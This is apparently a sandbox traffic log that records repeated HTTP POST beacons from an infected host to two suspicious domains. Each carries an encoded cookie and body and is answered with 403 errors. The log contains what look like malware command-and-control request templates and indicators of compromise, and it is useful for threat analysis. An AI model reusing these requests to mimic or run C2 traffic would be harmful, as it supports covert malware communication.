                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:11 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:11 UTC | 755 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:11 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSCNW9txY29WhwKOJ0uSgGvWJ82zsiHsaSjWWDbeypUyYa2%2BiH70zzO%2F5AepQLci1s0SefYitC1PmzpjdhZ%2FpGeI7FuZYk8nPMmyYjOlEAgA57hRE%2Fy1G5%2FJGW%2FpXiQa"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072bd1d646c80-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1962&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=1483606&cwnd=251&unsent_bytes=0&cid=06bcf1c192d78d40&ts=406&x=0"
2024-11-13 17:23:11 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:11 UTC | 5 | IN
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
64 | 192.168.2.6 | 50058 | 104.21.15.162 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:12 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:12 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:13 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:13 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Io%2BxfrBrKy5I6J13uaLBQm%2BZUKBKUvKw6vD9nuvhChW5CL5yklHSuzH9yp9TFAK6jlgSxabaGu8UqoVDwuEwkkHDA%2B1F52oPI3aGtto9EcywPZVHn1us0KwRNRRBf5sL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072c58a6ce387-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=141013&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=20577&cwnd=32&unsent_bytes=0&cid=d270895326dc000b&ts=818&x=0"
2024-11-13 17:23:13 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:13 UTC | 5 | IN
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
65 | 192.168.2.6 | 50059 | 104.21.92.105 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:14 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:14 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:15 UTC | 756 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:15 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vwx71jEP%2Bnq%2BzAbVTEnchr4c5SrwZxAw8ImT1K%2F2YBZIPGr5DO%2BfForNYG%2BwHrqfLEgJJXsuWuBO%2FSZMeFXbuAUXzGXXIeuVQhZXe%2BrGq2rsJ2idB0eaTQrz058HNyCo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072d1bb3bd79c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=141215&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=20516&cwnd=32&unsent_bytes=0&cid=65f56815b85c26a3&ts=708&x=0"
2024-11-13 17:23:15 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:15 UTC | 5 | IN
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
66 | 192.168.2.6 | 50061 | 104.21.15.162 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:16 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:16 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:16 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:16 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWgU9G4AQi5q94uNvw%2B4XK6ZJcqBKf1jI4j0AkqRA%2BXM8l1rM8ac7lpNzGhbJ91oSf2QcVmjN98KNw4OqeqT%2Fejp%2FTwQfdyoseRUwndK2eyUd7c5GArcFIjQfSpgcpcG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072daeebfe37e-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=167898&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=17512&cwnd=32&unsent_bytes=0&cid=e31ee755400a3862&ts=596&x=0"
2024-11-13 17:23:16 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:16 UTC | 5 | IN
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
67 | 192.168.2.6 | 50062 | 104.21.92.105 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:17 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:17 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:18 UTC | 756 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:17 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILsKwzIq6gbDJ4%2F66sgrnxje5FIUfgW1W%2BWB8IcNF%2BiKXLMAdgDE20dGWKMfQWyMH%2FCZqP8%2B%2Bc4AVU3IPEucSHvLO5bzgobpS0wPjJqZp2QMR4JtMOz%2BxCQcUzAMepWH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072e3fc62d79c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=146570&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20332&cwnd=32&unsent_bytes=0&cid=8b622a9829de32b7&ts=501&x=0"
2024-11-13 17:23:18 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
68 | 192.168.2.6 | 50063 | 104.21.15.162 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:19 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:19 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:19 UTC | 748 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:19 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KNz%2BwL5jt40WawpRVcr9nBci4YrOidndGEDRCzAEro1FUvYqV49pG5P2qf4v3eSgypbVebFdPnjs3LVTKAYi6K2Ynmk02zVeRYUbB%2BBO3FxErv1ToDJHh4rO%2BO2g7maZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072edc9a37374-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=129834&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=22287&cwnd=32&unsent_bytes=0&cid=1740d836c5f71e5f&ts=776&x=0"
2024-11-13 17:23:19 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
69 | 192.168.2.6 | 50064 | 104.21.92.105 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:20 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:20 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:21 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:21 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pswzgrdyDrsJIPX3dZ2LvrTG8xG8knbsZ5QD6m3x0cQaJM7PwZ2%2FOjnecOo1zx1BDqJGO%2BZOXy4ltUSCnbBEKY57071ar49gvf%2F3G7PXUj%2FDgTugD09g96w%2FR%2FHxJv8P"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2072f85989e36b-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=139980&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20059&cwnd=32&unsent_bytes=0&cid=e33bb2b48837105f&ts=505&x=0"
2024-11-13 17:23:21 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
70 | 192.168.2.6 | 50065 | 104.21.15.162 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:22 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:22 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:22 UTC | 752 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:22 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjae4mD%2BxOGAyipArYHkptJw9h%2FLNTpN88F791NgZ6QQ2ADVt%2BsjgaVXTcdMhrwRwYu3351lvFnGBYxWx9H%2BBqcxcOn5sSTjV7tOIrDk3SBBKpH%2BzdU9S5CUjF9wXRUG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20730148dcd768-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=156589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=18186&cwnd=32&unsent_bytes=0&cid=137fed4dc9920c19&ts=575&x=0"
2024-11-13 17:23:22 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:22 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
71 | 192.168.2.6 | 50066 | 104.21.92.105 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:23 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:23 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:23 UTC | 751 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:23 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2BJmJxP6Ps0agBrkSyQyry0%2F89gwUBxy3%2FI7dtX1kFSohIGH5r9QnfjOYbXNKKORvGnhgQhjjq%2FgbgEmAAJgE89H3kjREZTi0PJT7hf2yH4IXhKgThxt2oDhwZ3r5rpf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207308fd042c87-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1340&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=2154761&cwnd=228&unsent_bytes=0&cid=9241388e304601e6&ts=394&x=0"
2024-11-13 17:23:23 UTC | 555 | IN | Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
2024-11-13 17:23:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
72 | 192.168.2.6 | 50067 | 104.21.15.162 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-13 17:23:24 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
2024-11-13 17:23:24 UTC | 92 | OUT | Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
2024-11-13 17:23:25 UTC | 745 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:25 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GT21G0dGeeA0ByYvdUGiiYKVcqVQ8kfwIikzxsJy8UANjF6ZlDVtTWnOgs84m%2F8LKvWvgYk%2FkETiHhtnlJA6kOzEeNRloLBilIX5QEEmB6nwikz3K1g64qzxWe4OdTSr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2073107dcbc971-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=39825&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=72679&cwnd=32&unsent_bytes=0&cid=03bb5b8cf26572a9&ts=486&x=0"
                                                                                                                                          2024-11-13 17:23:25 UTC | 555 | IN
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:23:25 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                          73 | 192.168.2.6 | 50068 | 104.21.92.105 | 443
                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                          2024-11-13 17:23:26 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:23:26 UTC | 92 | OUT
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:23:27 UTC | 754 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:23:26 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VSOXVeC52kxi%2FRdy5quxEBnPOcwY2%2BiwczSgXYxF0GnIwMaqPDUsarstAnApM51Oyl%2F7Ngo%2BBfbPjcOeN8%2Fp1d%2BsHWkEFsaS5J4VXSsTSOkHLpjtswmfDsvZgaUGttnU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207318bfd8d788-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
